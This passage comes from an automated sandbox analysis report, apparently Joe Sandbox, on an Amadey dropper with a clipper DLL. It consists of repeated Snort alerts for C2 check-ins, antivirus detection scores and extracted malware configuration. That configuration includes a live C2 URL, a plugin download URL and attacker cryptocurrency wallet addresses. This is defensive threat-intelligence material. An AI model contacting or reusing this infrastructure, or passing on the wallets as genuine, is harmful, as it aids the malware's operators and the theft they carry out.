                          Source Port:50287
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450220802027700 02/07/23-20:03:12.442628
                          SID:2027700
                          Source Port:50220
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450315802027700 02/07/23-20:03:38.266612
                          SID:2027700
                          Source Port:50315
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450226802027700 02/07/23-20:03:13.874522
                          SID:2027700
                          Source Port:50226
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450394802027700 02/07/23-20:03:57.671451
                          SID:2027700
                          Source Port:50394
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450119802027700 02/07/23-20:02:44.644394
                          SID:2027700
                          Source Port:50119
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450208802027700 02/07/23-20:03:09.500907
                          SID:2027700
                          Source Port:50208
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450404802027700 02/07/23-20:04:00.112465
                          SID:2027700
                          Source Port:50404
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450060802027700 02/07/23-20:02:26.448814
                          SID:2027700
                          Source Port:50060
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450103802027700 02/07/23-20:02:40.685701
                          SID:2027700
                          Source Port:50103
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450109802027700 02/07/23-20:02:42.172519
                          SID:2027700
                          Source Port:50109
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449969802027700 02/07/23-20:01:59.969581
                          SID:2027700
                          Source Port:49969
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450080802027700 02/07/23-20:02:34.379327
                          SID:2027700
                          Source Port:50080
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449874802027700 02/07/23-20:01:33.109253
                          SID:2027700
                          Source Port:49874
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449963802027700 02/07/23-20:01:58.504584
                          SID:2027700
                          Source Port:49963
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449785802027700 02/07/23-20:01:07.828926
                          SID:2027700
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450210802027700 02/07/23-20:03:09.990259
                          SID:2027700
                          Source Port:50210
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450032802027700 02/07/23-20:02:18.890388
                          SID:2027700
                          Source Port:50032
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450014802027700 02/07/23-20:02:14.441730
                          SID:2027700
                          Source Port:50014
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450121802027700 02/07/23-20:02:45.141107
                          SID:2027700
                          Source Port:50121
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450338802027700 02/07/23-20:03:43.908584
                          SID:2027700
                          Source Port:50338
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450427802027700 02/07/23-20:04:05.737324
                          SID:2027700
                          Source Port:50427
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449823802027700 02/07/23-20:01:18.077794
                          SID:2027700
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449808802027700 02/07/23-20:01:14.637798
                          SID:2027700
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449820802027700 02/07/23-20:01:17.299894
                          SID:2027700
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449979802027700 02/07/23-20:02:02.207618
                          SID:2027700
                          Source Port:49979
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449731802027700 02/07/23-20:00:54.023441
                          SID:2027700
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449912802027700 02/07/23-20:01:42.328220
                          SID:2027700
                          Source Port:49912
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449994802027700 02/07/23-20:02:09.136024
                          SID:2027700
                          Source Port:49994
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450264802027700 02/07/23-20:03:25.691639
                          SID:2027700
                          Source Port:50264
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450353802027700 02/07/23-20:03:47.599615
                          SID:2027700
                          Source Port:50353
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449734802027700 02/07/23-20:00:54.737090
                          SID:2027700
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450001802027700 02/07/23-20:02:11.159823
                          SID:2027700
                          Source Port:50001
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450350802027700 02/07/23-20:03:46.848980
                          SID:2027700
                          Source Port:50350
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450172802027700 02/07/23-20:03:00.921461
                          SID:2027700
                          Source Port:50172
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450261802027700 02/07/23-20:03:23.514341
                          SID:2027700
                          Source Port:50261
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450442802027700 02/07/23-20:04:09.409561
                          SID:2027700
                          Source Port:50442
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450083802027700 02/07/23-20:02:35.239474
                          SID:2027700
                          Source Port:50083
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450086802027700 02/07/23-20:02:36.208344
                          SID:2027700
                          Source Port:50086
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450004802027700 02/07/23-20:02:11.893867
                          SID:2027700
                          Source Port:50004
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450175802027700 02/07/23-20:03:01.662459
                          SID:2027700
                          Source Port:50175
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450249802027700 02/07/23-20:03:19.487023
                          SID:2027700
                          Source Port:50249
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449925802027700 02/07/23-20:01:47.192101
                          SID:2027700
                          Source Port:49925
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450414802027700 02/07/23-20:04:02.595462
                          SID:2027700
                          Source Port:50414
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450325802027700 02/07/23-20:03:40.711953
                          SID:2027700
                          Source Port:50325
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450455802027700 02/07/23-20:04:12.584652
                          SID:2027700
                          Source Port:50455
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449747802027700 02/07/23-20:00:57.887103
                          SID:2027700
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449966802027700 02/07/23-20:01:59.250311
                          SID:2027700
                          Source Port:49966
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449877802027700 02/07/23-20:01:33.832947
                          SID:2027700
                          Source Port:49877
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449836802027700 02/07/23-20:01:21.202537
                          SID:2027700
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449772802027700 02/07/23-20:01:03.779261
                          SID:2027700
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449788802027700 02/07/23-20:01:09.765672
                          SID:2027700
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449991802027700 02/07/23-20:02:05.764041
                          SID:2027700
                          Source Port:49991
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449861802027700 02/07/23-20:01:29.882532
                          SID:2027700
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450058802027700 02/07/23-20:02:25.697906
                          SID:2027700
                          Source Port:50058
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450236802027700 02/07/23-20:03:16.324345
                          SID:2027700
                          Source Port:50236
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450017802027700 02/07/23-20:02:15.190910
                          SID:2027700
                          Source Port:50017
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450366802027700 02/07/23-20:03:50.757393
                          SID:2027700
                          Source Port:50366
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450099802027700 02/07/23-20:02:39.663652
                          SID:2027700
                          Source Port:50099
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450147802027700 02/07/23-20:02:54.873680
                          SID:2027700
                          Source Port:50147
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450188802027700 02/07/23-20:03:04.590702
                          SID:2027700
                          Source Port:50188
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450277802027700 02/07/23-20:03:28.892621
                          SID:2027700
                          Source Port:50277
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450106802027700 02/07/23-20:02:41.451184
                          SID:2027700
                          Source Port:50106
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllAvira URL Cloud: Label: malware
                          Source: http://62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                          Source: 62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                          Source: file.exeReversingLabs: Detection: 66%
                          Source: file.exeVirustotal: Detection: 48%Perma Link
                          Source: 62.204.41.4/Gol478Ns/index.phpVirustotal: Detection: 12%Perma Link
                          Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllVirustotal: Detection: 16%Perma Link
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dllReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeReversingLabs: Detection: 53%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 80%
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeJoe Sandbox ML: detected
                          Source: 19.0.mnolyk.exe.980000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                          Source: 22.2.rundll32.exe.6d0c0000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00EB2F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00942F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00942F1D

                          Compliance

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeUnpacked PE file: 2.2.afCf.exe.400000.0.unpack
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.250463432.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000B.00000003.316310103.0000000001682000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000000.315748298.000000000138E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000C.00000002.775000934.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000C.00000000.318162039.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.329735996.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.332650893.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.352215568.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.352736386.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000000.478701407.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000002.479552852.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.607657638.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.607327719.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000000.735938171.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000002.736512930.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.11.dr, xriv.exe.0.dr
                          Source: Binary string: Healer.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000006.00000000.290177703.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\wevepipes\ho.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000000.250999613.0000000000401000.00000020.00000001.01000000.00000005.sdmp, afCf.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000016.00000002.775107488.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.12.dr, clip64.dll.12.dr
                          Source: Binary string: Healer.pdbH5 source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00EB2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00942390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00942390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137FC58 FindFirstFileExW,11_2_0137FC58

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49718 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49720 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49721 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49722 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49723 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49724 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49725 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49726 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49727 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49728 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49729 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49730 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49731 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49732 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49733 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49734 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49735 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49736 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49737 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49738 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49739 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49740 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49741 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49742 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49743 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49744 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49745 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49746 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49747 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49748 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49749 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49750 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49751 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49752 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49753 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49754 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49755 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49756 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49757 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49758 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49759 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49761 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49762 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49763 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49764 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49765 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49766 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49767 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49768 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49769 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49770 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49771 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49772 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49773 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49774 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49775 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49777 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49778 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49779 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49780 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49781 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49782 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49783 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49784 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49785 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49786 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49787 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49788 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49789 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49790 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49791 -> 62.204.41.4:80
